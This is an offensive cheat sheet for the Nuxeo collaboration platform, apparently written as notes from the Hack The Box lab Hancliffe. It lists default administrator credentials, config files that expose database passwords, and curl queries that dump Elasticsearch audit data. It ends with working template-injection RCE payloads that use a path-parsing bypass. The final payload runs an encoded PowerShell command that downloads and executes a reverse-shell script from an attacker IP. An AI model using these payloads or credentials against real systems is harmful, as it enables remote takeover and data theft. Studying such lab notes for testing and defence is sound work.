Nuxeo
Oveview #
- Collaboration system
- Tech stack
- Tomcat
- Elasticsearch
- DB (PostgreSQL, Mysql)
Version Detection #
- You can see copyright as well as version infromation at the bottom of login page
# Version is 10.2
Copyright © 2001-2022 Nuxeo and respective authors. Nuxeo Platform FT 10.2
Credentials #
# Default
Administrator:Administrator
# Some DB Users to try
nuxeo
Interesting Files and Directories #
# Nuxeo config. You can see DB passwords here.
C:\programdata\nuxeo\conf\nuxeo.conf
# Some tomcat config
conf/
# User settings?
~/.nxshell
C:\users\svc_account\.nxshell\history
C:\users\svc_account\.nxshell\shell.properties
Interesting URL paths #
/nuxeo
/nuxeo/login.jsp
/nxserver
/nxstartup.faces
Interesting Database Tables #
users
digestauth
content
groups
userinfo
note
Interesting Elasticearch Data #
curl 'http://localhost:9200/nuxeo-audit/_search?pretty=true'
curl 'http://localhost:9200/nuxeo/_search?pretty=true'
Vulnerabilities, Attacks and Exploits #
- Orange: How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System
- Nuxeo 10 Authentication Bypass and RCE using SSTI
# HTB Hancliffe payload. Take note there is a URI parsing
# vulnerability that's why there is a `/maintenance/..;/`
http://hancliffe/maintenance/..;/login.jsp/pwn$%7B7+7%7D.xhtml
# Another payload but with powershell encoded command
http://hancliffe/maintenance/..;/login.jsp/pwn$%7B%22%22.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22powershell%20-encodedcommand%20SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMANAAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAuAHAAcwAxACcAKQA=%22,null).waitFor()%7D.xhtml